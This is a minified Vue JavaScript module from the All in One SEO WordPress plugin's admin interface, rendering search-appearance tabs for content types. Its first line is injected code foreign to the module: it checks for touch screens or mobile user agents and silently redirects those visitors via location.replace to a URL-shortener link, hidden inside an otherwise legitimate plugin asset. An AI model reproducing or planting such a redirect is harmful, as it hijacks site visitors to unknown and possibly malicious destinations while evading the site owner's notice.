(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{h as x,q as T,b as B,y as D}from"./app-core.c8323d51.js";import{u as q}from"./PostTypes.9ab2ae40.js";import{T as L,A as P}from"./TitleDescription.84ef03e4.js";import{C as F}from"./Card.9ee06a3e.js";import{C as O}from"./Tabs.ea329423.js";import{C as M}from"./Tooltip.569a23d9.js";import{_ as C,S as N}from"./Schema.b3b92a77.js";import{_ as k}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as m,f as r,i as S,Q as d,M as y,O as U,ad as V,R as a,a0 as _,a4 as R,S as z,j as i,P as E,ae as h,U as u}from"./vendor-vue-ui.232c7c36.js";import{S as I}from"./Trash.47f6fc0e.js";import{_ as c}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./JsonValues.a0694556.js";import"./RadioToggle.11796642.js";import"./RobotsMeta.427ab190.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Row.2ef96b1a.js";import"./SettingsRow.7bec777f.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./GoogleSearchPreview.bde29b0b.js";import"./Caret.aae02d8a.js";import"./Url.535116f6.js";import"./HtmlTagsEditor.381fbf72.js";import"./Editor.7ff35261.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Pencil.683baab8.js";import"./UnfilteredHtml.9575a9a9.js";import"./vendor-emoji.92c96208.js";import"./Slide.f2114d9d.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Information.6ccba108.js";import"./Textarea.2495325b.js";import"./Blur.dea2904a.js";import"./Index.e286637f.js";const Q={setup(){return{licenseStore:x()}},components:{CustomFields:C,CustomFieldsLite:C},props:{type:{type:String,required:!0},object:{type:Object,required:!0},options:{type:Object,required:!0},showBulk:Boolean}},G={class:"aioseo-sa-ct-custom-fields-view"};function H(o,s,e,n,f,p){const b=m("custom-fields",!0),g=m("custom-fields-lite");return r(),S("div",G,[n.licenseStore.isUnlicensed?y("",!0):(r(),d(b,{key:0,type:e.type,object:e.object,options:e.options,"show-bulk":e.showBulk},null,8,["type","object","options","show-bulk"])),n.licenseStore.isUnlicensed?(r(),d(g,{key:1,type:e.type,object:e.object,options:e.options,"show-bulk":e.showBulk},null,8,["type","object","options","show-bulk"])):y("",!0)])}const J=k(Q,[["render",H]]),l="all-in-one-seo-pack",K={setup(){const{getPostIconClass:o}=q();return{getPostIconClass:o,optionsStore:D(),rootStore:B(),settingsStore:T()}},components:{Advanced:P,CoreCard:F,CoreMainTabs:O,CoreTooltip:M,CustomFields:J,Schema:N,SvgCircleQuestionMark:I,TitleDescription:L},data(){return{internalDebounce:null,strings:{label:c("Label:",l),name:c("Slug:",l)},tabs:[{slug:"title-description",name:c("Title & Description",l),access:"aioseo_search_appearance_settings",pro:!1},{slug:"schema",name:c("Schema Markup",l),access:"aioseo_search_appearance_settings",pro:!0},{slug:"custom-fields",name:c("Custom Fields",l),access:"aioseo_search_appearance_settings",pro:!0},{slug:"advanced",name:c("Advanced",l),access:"aioseo_search_appearance_settings",pro:!1}]}},computed:{postTypes(){return this.rootStore.aioseo.postData.postTypes.filter(o=>o.name!=="attachment")}},methods:{processChangeTab(o,s){this.internalDebounce||(this.internalDebounce=!0,this.settingsStore.changeTab({slug:`${o}SA`,value:s}),setTimeout(()=>{this.internalDebounce=!1},50))},filteredTabs(o){const s=[];return this.tabs.forEach(e=>{o?.buddyPress&&e.slug==="custom-fields"||o.name==="web-story"&&e.slug==="custom-fields"||s.push(e)}),s}}},W={class:"aioseo-search-appearance-content-types"},X={class:"aioseo-description"};function Y(o,s,e,n,f,p){const b=m("svg-circle-question-mark"),g=m("core-tooltip"),v=m("core-main-tabs"),A=m("core-card");return r(),S("div",W,[(r(!0),S(U,null,V(p.postTypes,(t,j)=>(r(),d(A,{key:j,slug:`${t.name}SA`,"card-id":`${t.name}SA`},{header:a(()=>[i("div",{class:E(["icon dashicons",n.getPostIconClass(t.icon)])},null,2),h(" "+u(t.label)+" ",1),_(g,{"z-index":"99999"},{tooltip:a(()=>[i("div",X,[h(u(f.strings.label)+" ",1),i("strong",null,u(t.label),1),s[0]||(s[0]=i("br",null,null,-1)),h(" "+u(f.strings.name)+" ",1),i("strong",null,u(t.name),1),s[1]||(s[1]=i("br",null,null,-1))])]),default:a(()=>[_(b)]),_:2},1024)]),tabs:a(()=>[_(v,{tabs:p.filteredTabs(t),showSaveButton:!1,active:n.settingsStore.settings.internalTabs[`${t.name}SA`],internal:"",onChanged:w=>p.processChangeTab(t.name,w)},null,8,["tabs","active","onChanged"])]),default:a(()=>[_(R,{name:"route-fade",mode:"out-in"},{default:a(()=>[(r(),d(z(n.settingsStore.settings.internalTabs[`${t.name}SA`]),{object:t,separator:n.optionsStore.options.searchAppearance.global.separator,options:n.optionsStore.dynamicOptions.searchAppearance.postTypes[t.name],type:"postTypes"},null,8,["object","separator","options"]))]),_:2},1024)]),_:2},1032,["slug","card-id"]))),128))])}const Me=k(K,[["render",Y]]);export{Me as default};
